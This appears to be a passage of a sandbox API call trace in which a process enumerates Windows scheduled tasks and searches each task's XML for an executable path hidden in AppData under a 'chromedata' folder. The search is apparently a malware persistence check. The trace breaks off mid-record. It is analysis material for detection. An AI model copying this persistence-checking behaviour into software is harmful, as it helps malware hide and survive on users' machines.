	[0100.114] IRegisteredTask:get_Xml (in: This=0x63ff68, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Shell\\WindowsParentalControls</URI>\r\n    <Source>$(@%SystemRoot%\\System32\\wpcumi.dll,-300)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\wpcumi.dll,-301)</Author>\r\n    <Description>$(@%SystemRoot%\\System32\\wpcumi.dll,-302)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>false</Enabled>\r\n      <Delay>PT1S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{DFA14C43-F385-4170-99CC-1B7765FA0E4A}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.116] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Shell\\WindowsParentalControls</URI>\r\n    <Source>$(@%SystemRoot%\\System32\\wpcumi.dll,-300)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\wpcumi.dll,-301)</Author>\r\n    <Description>$(@%SystemRoot%\\System32\\wpcumi.dll,-302)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>false</Enabled>\r\n      <Delay>PT1S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{DFA14C43-F385-4170-99CC-1B7765FA0E4A}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.146] IUnknown:Release (This=0x63ff68) returned 0x0
	[0100.146] IRegisteredTaskCollection:get_Item (in: This=0x63fe80, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff68) returned 0x0
	[0100.146] IRegisteredTask:get_Name (in: This=0x63ff68, pName=0x128e3c | out: pName=0x128e3c*="WindowsParentalControlsMigration") returned 0x0
	[0100.146] IRegisteredTask:get_Xml (in: This=0x63ff68, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Shell\\WindowsParentalControlsMigration</URI>\r\n    <Source>$(@%SystemRoot%\\System32\\wpcmig.dll,-300)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\wpcmig.dll,-301)</Author>\r\n    <Description>$(@%SystemRoot%\\System32\\wpcmig.dll,-302)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"System\">\r\n      <GroupId>S-1-5-18</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"System\">\r\n    <ComHandler>\r\n      <ClassId>{343D770D-7788-47c2-B62A-B7C4CED925CB}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.149] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Shell\\WindowsParentalControlsMigration</URI>\r\n    <Source>$(@%SystemRoot%\\System32\\wpcmig.dll,-300)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\wpcmig.dll,-301)</Author>\r\n    <Description>$(@%SystemRoot%\\System32\\wpcmig.dll,-302)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"System\">\r\n      <GroupId>S-1-5-18</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"System\">\r\n    <ComHandler>\r\n      <ClassId>{343D770D-7788-47c2-B62A-B7C4CED925CB}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.179] IUnknown:Release (This=0x63ff68) returned 0x0
	[0100.179] IUnknown:Release (This=0x63fe80) returned 0x0
	[0100.179] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe80) returned 0x0
	[0100.180] ITaskFolderCollection:get_Count (in: This=0x63fe80, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.180] IUnknown:Release (This=0x63fe80) returned 0x0
	[0100.180] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.180] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1e, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.181] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe80) returned 0x0
	[0100.184] IRegisteredTaskCollection:get_Count (in: This=0x63fe80, pCount=0x128e30 | out: pCount=0x128e30*=4) returned 0x0
	[0100.184] IRegisteredTaskCollection:get_Item (in: This=0x63fe80, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff68) returned 0x0
	[0100.184] IRegisteredTask:get_Name (in: This=0x63ff68, pName=0x128e3c | out: pName=0x128e3c*="AutoWake") returned 0x0
	[0100.184] IRegisteredTask:get_Xml (in: This=0x63ff68, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)(A;;FR;;;AU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\AutoWake</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1201)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{E51DFD48-AA36-4B45-BB52-E831F02E8316}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.187] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)(A;;FR;;;AU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\AutoWake</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1201)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{E51DFD48-AA36-4B45-BB52-E831F02E8316}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.225] IUnknown:Release (This=0x63ff68) returned 0x0
	[0100.225] IRegisteredTaskCollection:get_Item (in: This=0x63fe80, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff68) returned 0x0
	[0100.225] IRegisteredTask:get_Name (in: This=0x63ff68, pName=0x128e3c | out: pName=0x128e3c*="GadgetManager") returned 0x0
	[0100.225] IRegisteredTask:get_Xml (in: This=0x63ff68, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;FRFX;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\GadgetManager</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1203)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>false</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <ComHandler>\r\n      <ClassId>{FF87090D-4A9A-4f47-879B-29A80C355D61}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.228] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;FRFX;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\GadgetManager</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1203)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>false</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <ComHandler>\r\n      <ClassId>{FF87090D-4A9A-4f47-879B-29A80C355D61}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.259] IUnknown:Release (This=0x63ff68) returned 0x0
	[0100.259] IRegisteredTaskCollection:get_Item (in: This=0x63fe80, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x3, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff68) returned 0x0
	[0100.259] IRegisteredTask:get_Name (in: This=0x63ff68, pName=0x128e3c | out: pName=0x128e3c*="SessionAgent") returned 0x0
	[0100.259] IRegisteredTask:get_Xml (in: This=0x63ff68, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\SessionAgent</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1202)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT15S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <ComHandler>\r\n      <ClassId>{45F26E9E-6199-477F-85DA-AF1EDfE067B1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.262] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\SessionAgent</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1202)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT15S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <ComHandler>\r\n      <ClassId>{45F26E9E-6199-477F-85DA-AF1EDfE067B1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.293] IUnknown:Release (This=0x63ff68) returned 0x0
	[0100.293] IRegisteredTaskCollection:get_Item (in: This=0x63fe80, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x4, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff68) returned 0x0
	[0100.293] IRegisteredTask:get_Name (in: This=0x63ff68, pName=0x128e3c | out: pName=0x128e3c*="SystemDataProviders") returned 0x0
	[0100.293] IRegisteredTask:get_Xml (in: This=0x63ff68, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;GRGWGX;;;LS)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\SystemDataProviders</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1200)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT30S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      